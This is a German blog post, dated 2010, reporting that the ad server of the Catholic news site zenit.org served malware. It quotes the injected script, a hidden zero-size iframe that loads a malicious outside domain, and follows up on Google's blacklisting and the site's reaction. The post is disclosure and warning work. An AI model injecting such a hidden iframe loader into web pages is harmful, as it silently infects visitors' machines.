26.4.10

Malware aus Rom

Zugriffe auf zenit.org ("Die Welt von Rom aus gesehen") führen anscheinend seit gestern zum Empfang von malware, u.a. eine Datei namens allv7.pdf sowie andere Inhalte die als malware erkannt werden. Ursache ist wohl deren ad server, der im javascript nach Aufruf von

http://advertising.zenit.org/www/delivery/ajs.php?zoneid=28&cb=1422&exclude=,&loc=

manchmal (aber nicht immer - mehrfach versuchen lohnt) Folgendes bringt:

"<"+"iframe src=\"http://trustandgoinc.com/in.cgi?default\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>

trustandgoinc.com hat, gelinde gesagt, keinen guten Ruf.

Nachtrag 21:27: es ist unklar ob das Problem nun behoben ist. Zenit antwortet nicht (trotz zwei Benachrichtigungen auf derem Kontaktformular http://zenit.org/form-8 !), malware-Meldungen kommen nicht mehr, aber das IFRAME tauchte noch auf. Es könnte aber auch sein dass trustandgoinc.com deaktiviert wurde.

Nachtrag 22:00: http://trustandgoinc.com/in.cgi?default achtet anscheinend darauf, wer aufruft, und liefert nur beim ersten Mal eine redirection auf eine andere dubiose Adresse, danach nur noch eine redirection auf google.

Nachtrag 27.4.2010 8:33: Google und Firefox haben trustandgoinc.com als "attackierend" registriert. Der Zenit ad server hat den Fehler noch immer.

Nachtrag 2.5.2010: Zwar noch immer keine Antwort von den Dilettanten aus Rom, aber der Zenit ad server ist nun gesperrt, nur über Kennwort zugänglich. Es wurde offenbar erst reagiert weil Google zenit.org selbst auf die Warnliste gesetzt hat. Die Stellungnahme von zenit.org ist, gelinde gesagt, scheinheilig - da der zenit.org ad server nun mal auf eine "böse" Seite verwiesen hat. Der Satz "Unsere Techniker garantieren, dass der Aufruf der Seiten keine Gefahr in sich birgt" ist ein Hohn - hätte ich damals nicht zeitnah nach der Heise-Meldung das update vom Acrobat Reader installiert, wäre ich nun infiziert.

Keine Kommentare:

Kommentar veröffentlichen